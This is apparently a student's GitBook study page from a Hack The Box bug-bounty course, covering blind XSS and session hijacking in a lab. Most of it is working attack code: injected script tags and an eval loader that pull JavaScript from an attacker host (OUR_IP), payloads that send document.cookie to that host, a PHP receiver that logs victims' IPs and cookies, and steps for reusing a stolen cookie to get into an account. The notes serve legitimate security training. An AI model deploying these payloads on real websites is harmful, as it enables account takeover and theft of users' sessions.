brain_fuck
Checklists
Checklists
  • 📁What Is It
  • 🐧Linux Hardening
    • Privilege Escalation - Linux
      • SUDO
      • Kernel Exploit
      • SUID or SGID
      • Capabilities
      • Cron Jobs
      • PATH Hijacking
      • NFS (Network File Sharing)
  • 🖼️Windows Hardening
    • Privilege Escalation - Windows
      • Abusing dangerous privileges
      • Abusing Service Misconfigurations
      • Abusing Vulnerable Software
      • Recopilación de contraseñas en sitios habituales
      • Otras escaladas
    • AD - Active Directory
      • Basic AD
      • Samba & NTML Relay
      • Pass The Hash (PTH)
      • Kerberoasting Attack
      • Golden Ticket & Pass The Ticket (PTT)
  • 🧰Tools
    • Nmap
    • John the Ripper
      • zip2john
    • Gobuster
    • Smbmap
    • Smbclient
    • WPScan
    • GitHack
    • Chisel
      • Proxychains/Sock
    • Hydra
    • Msfvenom
    • CrackMapExec
    • Psexec
    • BloondHound
    • Rpcclient
    • Ldapdomaindump
    • Evil-wmr
    • Burpsuite
    • KeyHunter
  • 📡Ports
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 443 - HTTPS
    • 139;445 - SMB
    • 3389 - RDP
    • 5985 - Wsman
  • 🍎Red - Bash Scripting
    • Pivoting
  • 🧙‍♂️Pentesting Methodology
    • Pivoting
      • Ligolo-ng
  • 🌐OSINT
    • Gps-Coordinates
    • GPG
    • Sherlock
    • Whatsmyname
    • Wiggle
    • Image & Geospatial Intelligence
    • FFmpeg - Geolocating Videos
  • 🗒️TO-DO
  • 🕷️HTB-CBBH
    • Web Requests - Fundamentals
      • HTTP Fundamentals
        • HyperText Transfer Protocol (HTTP)
          • Hypertext Transfer Protocol Secure (HTTPS)
        • HTTP Requests and Responses
        • HTTP Headers
      • HTTP Methods
        • HTTP Methods & Codes
        • GET
        • POST
        • CRUD API
    • Introduction to Web Applications - Fundamentals
      • Front Components & Vulns
      • Back End Components & Vulns
    • Hacking WordPress
      • Info
      • Enumeration
      • Exploitin
    • Using Web Proxies
      • Web Proxy
      • Web Fuzzer
      • Extensions
    • Information Gathering - Web Edition
      • DNS & Subdomains
    • Attacking Web Applications with Ffuf
      • Fuzzing
    • JavaScript Deobfuscation
      • Deobfuscation & Decode
    • Cross-Site Scripting (XSS)
      • XSS Basics
      • XSS Phishing
      • Blind XSS - Session Hijacking
    • SQL Injection
      • Databases & Queries
      • SQL Injections
      • Exploitation
        • Database Enumeration
        • Reading Files
        • Writing Files
      • Skill Assessment
    • SQLMap Essentials
      • Building Attacks
Powered by GitBook
On this page
  • Blind XSS Detection
  • Session Hijacking
  • Resume
  1. HTB-CBBH
  2. Cross-Site Scripting (XSS)

Blind XSS - Session Hijacking

PreviousXSS PhishingNextSQL Injection

Last updated 6 days ago

Blind XSS Detection

Let's run the test on the web application on (/hijacking) in the server at the end of this section. We see a User Registration page with multiple fields, so let's try to submit a test user to see how the form handles the data:

As we can see, once we submit the form we get the following message:

Session Hijacking

A session hijacking attack is very similar to the phishing attack we performed in the previous section. It requires a JavaScript payload to send us the required data and a PHP script hosted on our server to grab and parse the transmitted data.

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

We can write any of these JavaScript payloads to script.js, which will be hosted on our VM as well:

new Image().src='http://OUR_IP/index.php?c='+document.cookie

Now, we can change the URL in the XSS payload we found earlier to use script.js (don't forget to replace OUR_IP with your VM IP in the JS script and the XSS payload):

<script src=http://OUR_IP/script.js></script>

Now, we wait for the victim to visit the vulnerable page and view our XSS payload. Once they do, we will get two requests on our server, one for script.js, which in turn will make another request with the cookie value:

10.10.10.10:52798 [200]: /script.js
10.10.10.10:52799 [200]: /index.php?c=cookie=f904f93c949d19d870911bf8b05fe7b2

We can save the following PHP script as index.php, and re-run the PHP server again:

Code: php

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

As mentioned earlier, we get the cookie value right in the terminal, as we can see. However, since we prepared a PHP script, we also get the cookies.txt file with a clean log of cookies:

eldeim@htb[/htb]$ cat cookies.txt 
Victim IP: 10.10.10.1 | Cookie: cookie=f904f93c949d19d870911bf8b05fe7b2

Finally, we can use this cookie on the login.php page to access the victim's account. To do so, once we navigate to /hijacking/login.php, we can click Shift+F9 in Firefox to reveal the Storage bar in the Developer Tools. Then, we can click on the + button on the top right corner and add our cookie, where the Name is the part before = and the Value is the part after = from our stolen cookie:

Resume

Test to be Performed

We set up a server and try XSS in inputs

mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 0.0.0.0:8000
<script src="http://TU_IP:8000/username"></script>  ← lo pones en el campo 'username'
<script src="http://TU_IP:8000/fullname"></script>  ← lo pones en el campo 'fullname'
## Test anothers payloadsallthethings -->
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>

Maybe there is a content field to enter url and redirect to our web server

Malicious Payload

document.location='http://OUR_IP/index.php?c='+document.cookie;
## or
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

Create this payload with name example script.js in /tmp/tmpserver

Build the receptor

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

It save with name index.php

Send the XSS injection and Wait

<script src="http://TU_IP:8000/script.js"></script>
## or anothers exploits detected of payloadsallthethings idk

There are multiple JavaScript payloads we can use to grab the session cookie and send it to us, as shown by :

🕷️
PayloadsAllTheThings